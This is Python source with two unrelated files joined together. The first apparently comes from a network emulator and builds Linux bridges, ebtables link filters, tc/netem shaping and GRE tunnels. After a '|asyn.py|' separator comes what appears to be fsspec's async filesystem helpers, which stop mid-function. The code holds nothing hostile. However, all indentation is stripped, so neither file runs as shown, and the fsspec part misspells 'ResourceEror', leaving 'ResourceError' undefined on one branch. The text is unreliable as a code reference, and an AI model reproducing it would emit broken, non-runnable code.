from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel
WirelessModelType = Type[WirelessModel]
ebtables_lock = threading.Lock()
class EbtablesQueue:
"""
Helper class for queuing up ebtables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate = 0.3
# ebtables
atomic_file = "/tmp/pycore.ebtables.atomic"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.doupdateloop = False
self.updatethread = None
# this lock protects cmds and updates lists
self.updatelock = threading.Lock()
# list of pending ebtables commands
self.cmds = []
# list of WLANs requiring update
self.updates = []
# timestamps of last WLAN update; this keeps track of WLANs that are
# using this queue
self.last_update_time = {}
def startupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kick off the update loop; only needs to be invoked once.
:return: nothing
"""
with self.updatelock:
self.last_update_time[wlan] = time.monotonic()
if self.doupdateloop:
return
self.doupdateloop = True
self.updatethread = threading.Thread(target=self.updateloop)
self.updatethread.daemon = True
self.updatethread.start()
def stopupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kill the update loop thread if there are no more WLANs using it.
:return: nothing
"""
with self.updatelock:
try:
del self.last_update_time[wlan]
except KeyError:
logging.exception(
"error deleting last update time for wlan, ignored before: %s", wlan
)
if len(self.last_update_time) > 0:
return
self.doupdateloop = False
if self.updatethread:
self.updatethread.join()
self.updatethread = None
def ebatomiccmd(self, cmd: str) -> str:
"""
Helper for building ebtables atomic file command list.
:param cmd: ebtable command
:return: ebtable atomic command
"""
return f"{EBTABLES_BIN} --atomic-file {self.atomic_file} {cmd}"
def lastupdate(self, wlan: "CoreNetwork") -> float:
"""
Return the time elapsed since this WLAN was last updated.
:param wlan: wlan entity
:return: elpased time
"""
try:
elapsed = time.monotonic() - self.last_update_time[wlan]
except KeyError:
self.last_update_time[wlan] = time.monotonic()
elapsed = 0.0
return elapsed
def updated(self, wlan: "CoreNetwork") -> None:
"""
Keep track of when this WLAN was last updated.
:param wlan: wlan entity
:return: nothing
"""
self.last_update_time[wlan] = time.monotonic()
self.updates.remove(wlan)
def updateloop(self) -> None:
"""
Thread target that looks for WLANs needing update, and
rate limits the amount of ebtables activity. Only one userspace program
should use ebtables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.doupdateloop:
with self.updatelock:
for wlan in self.updates:
# Check if wlan is from a previously closed session. Because of the
# rate limiting scheme employed here, this may happen if a new session
# is started soon after closing a previous session.
# TODO: if these are WlanNodes, this will never throw an exception
try:
wlan.session
except Exception:
# Just mark as updated to remove from self.updates.
self.updated(wlan)
continue
if self.lastupdate(wlan) > self.rate:
self.buildcmds(wlan)
self.ebcommit(wlan)
self.updated(wlan)
time.sleep(self.rate)
def ebcommit(self, wlan: "CoreNetwork") -> None:
"""
Perform ebtables atomic commit using commands built in the self.cmds list.
:return: nothing
"""
# save kernel ebtables snapshot to a file
args = self.ebatomiccmd("--atomic-save")
wlan.host_cmd(args)
# modify the table file using queued ebtables commands
for c in self.cmds:
args = self.ebatomiccmd(c)
wlan.host_cmd(args)
self.cmds = []
# commit the table file to the kernel
args = self.ebatomiccmd("--atomic-commit")
wlan.host_cmd(args)
try:
wlan.host_cmd(f"rm -f {self.atomic_file}")
except CoreCommandError:
logging.exception("error removing atomic file: %s", self.atomic_file)
def ebchange(self, wlan: "CoreNetwork") -> None:
"""
Flag a change to the given WLAN's _linked dict, so the ebtables
chain will be rebuilt at the next interval.
:return: nothing
"""
with self.updatelock:
if wlan not in self.updates:
self.updates.append(wlan)
def buildcmds(self, wlan: "CoreNetwork") -> None:
"""
Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.
:return: nothing
"""
with wlan._linked_lock:
if wlan.has_ebtables_chain:
# flush the chain
self.cmds.append(f"-F {wlan.brname}")
else:
wlan.has_ebtables_chain = True
self.cmds.extend(
[
f"-N {wlan.brname} -P {wlan.policy}",
f"-A FORWARD --logical-in {wlan.brname} -j {wlan.brname}",
]
)
# rebuild the chain
for netif1, v in wlan._linked.items():
for netif2, linked in v.items():
if wlan.policy == "DROP" and linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {netif1.localname} -o {netif2.localname} -j ACCEPT",
f"-A {wlan.brname} -o {netif1.localname} -i {netif2.localname} -j ACCEPT",
]
)
elif wlan.policy == "ACCEPT" and not linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {netif1.localname} -o {netif2.localname} -j DROP",
f"-A {wlan.brname} -o {netif1.localname} -i {netif2.localname} -j DROP",
]
)
# a global object because all WLANs share the same queue
# cannot have multiple threads invoking the ebtables commnd
ebq = EbtablesQueue()
def ebtablescmds(call: Callable[..., str], cmds: List[str]) -> None:
"""
Run ebtable commands.
:param call: function to call commands
:param cmds: commands to call
:return: nothing
"""
with ebtables_lock:
for args in cmds:
call(args)
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy = "DROP"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
start: bool = True,
server: "DistributedServer" = None,
policy: str = None,
) -> None:
"""
Creates a LxBrNet instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param start: start flag
:param server: remote server node
will run on, default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, start, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy = policy
self.name = name
sessionid = self.session.short_session_id()
self.brname = f"b.{self.id}.{sessionid}"
self.up = False
self.has_ebtables_chain = False
if start:
self.startup()
ebq.startupdateloop(self)
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: str = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and setup the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logging.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge starup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
self.has_ebtables_chain = False
self.up = True
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
ebq.stopupdateloop(self)
try:
self.net_client.delete_bridge(self.brname)
if self.has_ebtables_chain:
cmds = [
f"{EBTABLES_BIN} -D FORWARD --logical-in {self.brname} -j {self.brname}",
f"{EBTABLES_BIN} -X {self.brname}",
]
ebtablescmds(self.host_cmd, cmds)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for netif in self.netifs():
netif.shutdown()
self._netif.clear()
self._linked.clear()
del self.session
self.up = False
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface.
:param netif: network interface to attach
:return: nothing
"""
if self.up:
netif.net_client.create_interface(self.brname, netif.localname)
super().attach(netif)
def detach(self, netif: CoreInterface) -> None:
"""
Detach a network interface.
:param netif: network interface to detach
:return: nothing
"""
if self.up:
netif.net_client.delete_interface(self.brname, netif.localname)
super().detach(netif)
def linked(self, netif1: CoreInterface, netif2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param netif1: interface one
:param netif2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self._netif[netif1.netifi] != netif1:
raise ValueError(f"inconsistency for netif {netif1.name}")
if self._netif[netif2.netifi] != netif2:
raise ValueError(f"inconsistency for netif {netif2.name}")
try:
linked = self._linked[netif1][netif2]
except KeyError:
if self.policy == "ACCEPT":
linked = True
elif self.policy == "DROP":
linked = False
else:
raise Exception(f"unknown policy: {self.policy}")
self._linked[netif1][netif2] = linked
return linked
def unlink(self, netif1: CoreInterface, netif2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing ebtables
filtering rules.
:param netif1: interface one
:param netif2: interface two
:return: nothing
"""
with self._linked_lock:
if not self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = False
ebq.ebchange(self)
def link(self, netif1: CoreInterface, netif2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
ebtables filtering rules.
:param netif1: interface one
:param netif2: interface two
:return: nothing
"""
with self._linked_lock:
if self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = True
ebq.ebchange(self)
def linkconfig(
self,
netif: CoreInterface,
bw: float = None,
delay: float = None,
loss: float = None,
duplicate: float = None,
jitter: float = None,
netif2: float = None,
devname: str = None,
) -> None:
"""
Configure link parameters by applying tc queuing disciplines on the interface.
:param netif: interface one
:param bw: bandwidth to set to
:param delay: packet delay to set to
:param loss: packet loss to set to
:param duplicate: duplicate percentage to set to
:param jitter: jitter to set to
:param netif2: interface two
:param devname: device name
:return: nothing
"""
if devname is None:
devname = netif.localname
tc = f"{TC_BIN} qdisc replace dev {devname}"
parent = "root"
changed = False
if netif.setparam("bw", bw):
# from tc-tbf(8): minimum value for burst is rate / kernel_hz
if bw is not None:
burst = max(2 * netif.mtu, bw / 1000)
# max IP payload
limit = 0xFFFF
tbf = f"tbf rate {bw} burst {burst} limit {limit}"
if bw > 0:
if self.up:
cmd = f"{tc} {parent} handle 1: {tbf}"
netif.host_cmd(cmd)
netif.setparam("has_tbf", True)
changed = True
elif netif.getparam("has_tbf") and bw <= 0:
if self.up:
cmd = f"{TC_BIN} qdisc delete dev {devname} {parent}"
netif.host_cmd(cmd)
netif.setparam("has_tbf", False)
# removing the parent removes the child
netif.setparam("has_netem", False)
changed = True
if netif.getparam("has_tbf"):
parent = "parent 1:1"
netem = "netem"
changed = max(changed, netif.setparam("delay", delay))
if loss is not None:
loss = float(loss)
changed = max(changed, netif.setparam("loss", loss))
if duplicate is not None:
duplicate = int(duplicate)
changed = max(changed, netif.setparam("duplicate", duplicate))
changed = max(changed, netif.setparam("jitter", jitter))
if not changed:
return
# jitter and delay use the same delay statement
if delay is not None:
netem += f" delay {delay}us"
if jitter is not None:
if delay is None:
netem += f" delay 0us {jitter}us 25%"
else:
netem += f" {jitter}us 25%"
if loss is not None and loss > 0:
netem += f" loss {min(loss, 100)}%"
if duplicate is not None and duplicate > 0:
netem += f" duplicate {min(duplicate, 100)}%"
delay_check = delay is None or delay <= 0
jitter_check = jitter is None or jitter <= 0
loss_check = loss is None or loss <= 0
duplicate_check = duplicate is None or duplicate <= 0
if all([delay_check, jitter_check, loss_check, duplicate_check]):
# possibly remove netem if it exists and parent queue wasn't removed
if not netif.getparam("has_netem"):
return
if self.up:
cmd = f"{TC_BIN} qdisc delete dev {devname} {parent} handle 10:"
netif.host_cmd(cmd)
netif.setparam("has_netem", False)
elif len(netem) > 1:
if self.up:
cmd = (
f"{TC_BIN} qdisc replace dev {devname} {parent} handle 10: {netem}"
)
netif.host_cmd(cmd)
netif.setparam("has_netem", True)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
if len(localname) >= 16:
raise ValueError(f"interface local name {localname} too long")
name = f"veth{net_id}.{_id}.{sessionid}"
if len(name) >= 16:
raise ValueError(f"interface name {name} too long")
netif = Veth(self.session, None, name, localname, start=self.up)
self.attach(netif)
if net.up:
# this is similar to net.attach() but uses netif.name instead of localname
netif.net_client.create_interface(net.brname, netif.name)
i = net.newifindex()
net._netif[i] = netif
with net._linked_lock:
net._linked[netif] = {}
netif.net = self
netif.othernet = net
return netif
def getlinknetif(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
Return the interface of that links this net with another net
(that were linked using linknet()).
:param net: interface to get link for
:return: interface the provided network is linked to
"""
for netif in self.netifs():
if hasattr(netif, "othernet") and netif.othernet == net:
return netif
return None
def addrconfig(self, addrlist: List[str]) -> None:
"""
Set addresses on the bridge.
:param addrlist: address list
:return: nothing
"""
if not self.up:
return
for addr in addrlist:
self.net_client.create_address(self.brname, str(addr))
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: str = "ACCEPT",
localip: str = None,
ttl: int = 255,
key: int = None,
start: bool = True,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param start: start flag
:param server: remote server node
will run on, default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, False, server, policy)
self.grekey = key
if self.grekey is None:
self.grekey = self.session.id ^ self.id
self.localnum = None
self.remotenum = None
self.remoteip = remoteip
self.localip = localip
self.ttl = ttl
if remoteip is None:
self.gretap = None
else:
self.gretap = GreTap(
node=self,
session=session,
remoteip=remoteip,
localip=localip,
ttl=ttl,
key=self.grekey,
)
if start:
self.startup()
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def addrconfig(self, addrlist: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param addrlist: address list
:return: nothing
"""
if self.gretap:
raise ValueError(f"gretap already exists for {self.name}")
remoteip = addrlist[0].split("/")[0]
localip = None
if len(addrlist) > 1:
localip = addrlist[1].split("/")[0]
self.gretap = GreTap(
session=self.session,
remoteip=remoteip,
localip=localip,
ttl=self.ttl,
key=self.grekey,
)
self.attach(self.gretap)
def setkey(self, key: int) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:return: nothing
"""
self.grekey = key
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy = "ACCEPT"
# base control interface index
CTRLIF_IDX_BASE = 99
DEFAULT_PREFIX_LIST = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
prefix: str = None,
hostid: int = None,
start: bool = True,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: CoreInterface = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
:param name: node namee
:param prefix: control network ipv4 prefix
:param hostid: host id
:param start: start flag
:param server: remote server node
will run on, default is None for localhost
:param assign_address: assigned address
:param updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix = netaddr.IPNetwork(prefix).cidr
self.hostid = hostid
self.assign_address = assign_address
self.updown_script = updown_script
self.serverintf = serverintf
super().__init__(session, _id, name, start, server)
def add_addresses(self, index: int) -> None:
"""
Add addresses used for created control networks,
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.options.get_config("ovs") == "True"
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logging.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logging.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.create_interface(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_interface(self.brname, self.serverintf)
except CoreCommandError:
logging.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logging.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logging.exception("error issuing shutdown script shutdown")
super().shutdown()
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy = "ACCEPT"
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param netif: network interface
:return: nothing
"""
if len(self._netif) >= 2:
raise ValueError(
"Point-to-point links support at most 2 network interfaces"
)
super().attach(netif)
def data(
self,
message_type: int,
lat: float = None,
lon: float = None,
alt: float = None,
source: str = None,
) -> NodeData:
"""
Do not generate a Node Message for point-to-point links. They are
built using a link message instead.
:param message_type: purpose for the data object we are creating
:param lat: latitude
:param lon: longitude
:param alt: altitude
:param source: source of node data
:return: node data object
"""
return None
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self._netif) != 2:
return all_links
if1, if2 = self._netif.values()
unidirectional = 0
if if1.getparams() != if2.getparams():
unidirectional = 1
interface1_ip4 = None
interface1_ip4_mask = None
interface1_ip6 = None
interface1_ip6_mask = None
for address in if1.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if netaddr.valid_ipv4(ip):
interface1_ip4 = ip
interface1_ip4_mask = mask
else:
interface1_ip6 = ip
interface1_ip6_mask = mask
interface2_ip4 = None
interface2_ip4_mask = None
interface2_ip6 = None
interface2_ip6_mask = None
for address in if2.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if netaddr.valid_ipv4(ip):
interface2_ip4 = ip
interface2_ip4_mask = mask
else:
interface2_ip6 = ip
interface2_ip6_mask = mask
link_data = LinkData(
message_type=flags,
node1_id=if1.node.id,
node2_id=if2.node.id,
link_type=self.linktype,
unidirectional=unidirectional,
delay=if1.getparam("delay"),
bandwidth=if1.getparam("bw"),
per=if1.getparam("loss"),
dup=if1.getparam("duplicate"),
jitter=if1.getparam("jitter"),
interface1_id=if1.node.getifindex(if1),
interface1_mac=if1.hwaddr,
interface1_ip4=interface1_ip4,
interface1_ip4_mask=interface1_ip4_mask,
interface1_ip6=interface1_ip6,
interface1_ip6_mask=interface1_ip6_mask,
interface2_id=if2.node.getifindex(if2),
interface2_mac=if2.hwaddr,
interface2_ip4=interface2_ip4,
interface2_ip4_mask=interface2_ip4_mask,
interface2_ip6=interface2_ip6,
interface2_ip6_mask=interface2_ip6_mask,
)
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
link_data = LinkData(
message_type=0,
link_type=self.linktype,
node1_id=if2.node.id,
node2_id=if1.node.id,
delay=if2.getparam("delay"),
bandwidth=if2.getparam("bw"),
per=if2.getparam("loss"),
dup=if2.getparam("duplicate"),
jitter=if2.getparam("jitter"),
unidirectional=1,
interface1_id=if2.node.getifindex(if2),
interface2_id=if1.node.getifindex(if1),
)
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype = NodeTypes.SWITCH.value
policy = "ACCEPT"
type = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype = NodeTypes.HUB.value
policy = "ACCEPT"
type = "hub"
def startup(self) -> None:
"""
Startup for a hub node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.disable_mac_learning(self.brname)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype = NodeTypes.WIRELESS_LAN.value
linktype = LinkTypes.WIRED.value
policy = "DROP"
type = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
start: bool = True,
server: "DistributedServer" = None,
policy: str = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param start: start flag
:param server: remote server node
will run on, default is None for localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, start, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model = None
self.mobility = None
def startup(self) -> None:
"""
Startup for a wlan node, that disables mac learning after normal startup.
:return: nothing
"""
super().startup()
self.net_client.disable_mac_learning(self.brname)
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface.
:param netif: network interface
:return: nothing
"""
super().attach(netif)
if self.model:
netif.poshook = self.model.position_callback
if netif.node is None:
return
x, y, z = netif.node.position.get()
# invokes any netif.poshook
netif.setposition(x, y, z)
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logging.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS.value:
self.model = model(session=self.session, _id=self.id)
for netif in self.netifs():
netif.poshook = self.model.position_callback
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY.value:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise ValueError(f"no mobility set to update for node({self.id})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise ValueError(f"no model set to update for node({self.id})")
logging.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for netif in self.netifs():
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
all_links = super().all_link_data(flags)
if self.model:
all_links.extend(self.model.all_link_data(flags))
return all_links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype = NodeTypes.TUNNEL.value
policy = "ACCEPT"
type = "tunnel"
|
asyn.py
|
import asyncio
import asyncio.events
import functools
import inspect
import os
import re
import sys
import threading
from contextlib import contextmanager
from glob import has_magic
from .callbacks import _DEFAULT_CALLBACK
from .exceptions import FSTimeoutError
from .spec import AbstractFileSystem
from .utils import PY36, is_exception, other_paths
private = re.compile("_[^_]")
async def _runner(event, coro, result, timeout=None):
timeout = timeout if timeout else None # convert 0 or 0.0 to None
if timeout is not None:
coro = asyncio.wait_for(coro, timeout=timeout)
try:
result[0] = await coro
except Exception as ex:
result[0] = ex
finally:
event.set()
if PY36:
grl = asyncio.events._get_running_loop
else:
grl = asyncio.events.get_running_loop
def sync(loop, func, *args, timeout=None, **kwargs):
"""
Make loop run coroutine until it returns. Runs in other thread
"""
timeout = timeout if timeout else None # convert 0 or 0.0 to None
# NB: if the loop is not running *yet*, it is OK to submit work
# and we will wait for it
if loop is None or loop.is_closed():
raise RuntimeError("Loop is not running")
try:
loop0 = grl()
if loop0 is loop:
raise NotImplementedError("Calling sync() from within a running loop")
except RuntimeError:
pass
coro = func(*args, **kwargs)
result = [None]
event = threading.Event()
asyncio.run_coroutine_threadsafe(_runner(event, coro, result, timeout), loop)
while True:
# this loops allows thread to get interrupted
if event.wait(1):
break
if timeout is not None:
timeout -= 1
if timeout < 0:
raise FSTimeoutError
if isinstance(result[0], asyncio.TimeoutError):
# suppress asyncio.TimeoutError, raise FSTimeoutError
raise FSTimeoutError
if isinstance(result[0], BaseException):
raise result[0]
return result[0]
iothread = [None] # dedicated fsspec IO thread
loop = [None] # global event loop for any non-async instance
lock = threading.Lock() # for setting exactly one thread
def sync_wrapper(func, obj=None):
"""Given a function, make so can be called in async or blocking contexts
Leave obj=None if defining within a class. Pass the instance if attaching
as an attribute of the instance.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = obj or args[0]
return sync(self.loop, func, *args, **kwargs)
return wrapper
@contextmanager
def _selector_policy():
original_policy = asyncio.get_event_loop_policy()
try:
if (
sys.version_info >= (3, 8)
and os.name == "nt"
and hasattr(asyncio, "WindowsSelectorEventLoopPolicy")
):
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
yield
finally:
asyncio.set_event_loop_policy(original_policy)
def get_running_loop():
if hasattr(asyncio, "get_running_loop"):
return asyncio.get_running_loop()
else:
loop = asyncio._get_running_loop()
if loop is None:
raise RuntimeError("no running event loop")
else:
return loop
def get_loop():
"""Create or return the default fsspec IO loop
The loop will be running on a separate thread.
"""
if loop[0] is None:
with lock:
# repeat the check just in case the loop got filled between the
# previous two calls from another thread
if loop[0] is None:
with _selector_policy():
loop[0] = asyncio.new_event_loop()
th = threading.Thread(target=loop[0].run_forever, name="fsspecIO")
th.daemon = True
th.start()
iothread[0] = th
return loop[0]
@contextmanager
def fsspec_loop():
"""Temporarily switch the current event loop to the fsspec's
own loop, and then revert it back after the context gets
terinated.
"""
try:
original_loop = get_running_loop()
except RuntimeError:
original_loop = None
fsspec_loop = get_loop()
try:
asyncio._set_running_loop(fsspec_loop)
yield fsspec_loop
finally:
asyncio._set_running_loop(original_loop)
try:
import resource
except ImportError:
resource = None
ResourceError = OSError
else:
ResourceEror = resource.error
_DEFAULT_BATCH_SIZE = 128
def _get_batch_size():
from fsspec.config import conf
if "gather_batch_size" in conf:
return conf["gather_batch_size"]
if resource is None:
return _DEFAULT_BATCH_SIZE
try:
soft_limit, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
except (ImportError, ValueError, ResourceError):
return _DEFAULT_BATCH_SIZE
if soft_limit == resource.RLIM_INFINITY:
return -1
else:
return soft_limit // 8
async def _run_coros_in_chunks(
coros, batch_size=None, callback=_DEFAULT_CALLBACK, timeout=None
):
"""Run the given coroutines in smaller chunks to
not crossing the file descriptor limit.
If batch_size parameter is -1, then it will not be any throttling. If
it is none, it will be inferred from the process resources (soft limit divided
by 8) and fallback to 128 if the system doesn't support it."""
if batch_size is None:
batch_size = _get_batch_size()
if batch_size == -1:
batch_size = len(coros)
assert batch_size > 0
results = []
for start in range(0, len(coros), batch_size):
chunk = coros[start : start + batch_size]
for coro in asyncio.as_completed(chunk, timeout=timeout):
results.append(await coro)
callback.call("relative_update", 1)
return results
# these methods should be implemented as async by any async-able backend
async_methods = [
"_ls",
"_cat_file",
"_get_file",
"_put_file",
"_rm_file",
"_cp_file",
"_pipe_file",
"_expand_path",
"_info",
"_isfile",
"_isdir",
"_exists",
"_walk",
"_glob",
"_find",
"_du",
"_size",
"_mkdir",
"_makedirs",
]
class AsyncFileSystem(AbstractFileSystem):
"""Async file operations, default implementations
Passes bulk operations to asyncio.gather for concurrent operation.
Implementations that have concurrent batch operations and/or async methods
should inherit from this class instead of AbstractFileSystem. Docstrings are
copied from the un-underscored method in AbstractFileSystem, if not given.
"""
# note that methods do not have docstring here; they will be copied
# for _* methods and inferred for overridden methods.
async_impl = True
disable_throttling = False
def __init__(self, *args, asynchronous=False, loop=None, **kwargs):
self.asynchronous = asynchronous
self._pid = os.getpid()
if not asynchronous:
self._loop = loop or get_loop()
else:
self._loop = None
self.batch_size = kwargs.pop("batch_size", None)
super().__init__(*args, **kwargs)
@property
def loop(self):
if self._pid != os.getpid():
raise RuntimeError("This class is not fork-safe")
return self._loop
async def _rm_file(self, path, **kwargs):
raise NotImplementedError
async def _rm(self, path, recursive=False, **kwargs):
# TODO: implement on_error
path = await self._expand_path(path, recursive=recursive)
await asyncio.gather(*[self._rm_file(p, **kwargs) for p in path])
async def _copy(
self, path1, path2, recursive=False, on_error=None, maxdepth=None, **kwargs
):
if on_error is None and recursive:
on_error = "ignore"
elif on_error is None:
on_error = "raise"
paths = await self._expand_path(path1, maxdepth=maxdepth, recursive=recursive)
path2 = other_paths(paths, path2)
result = await asyncio.gather(
*[self._cp_file(p1, p2, **kwargs) for p1, p2 in zip(paths, path2)],
return_exceptions=True,
)
for ex in filter(is_exception, result):
if on_error == "ignore" and isinstance(ex, FileNotFoundError):
continue
raise ex
async def _pipe(self, path, value=None, **kwargs):
if isinstance(path, str):
path = {path: value}
await asyncio.gather(
*[self._pipe_file(k, v, **kwargs) for k, v in path.items()]
)
async def _process_limits(self, url, start, end):
"""Helper for "Range"-based _cat_file"""
size = None
suff = False
if start is not None and start < 0:
# if start is negative and end None, end is the "suffix length"
if end is None:
end = -start
start = ""
suff = True
else:
size = size or (await self._info(url))["size"]
start = size + start
elif start is None:
start = 0
if not suff:
if end is not None and end < 0:
if start is not None:
size = size or (await self._info(url))["size"]
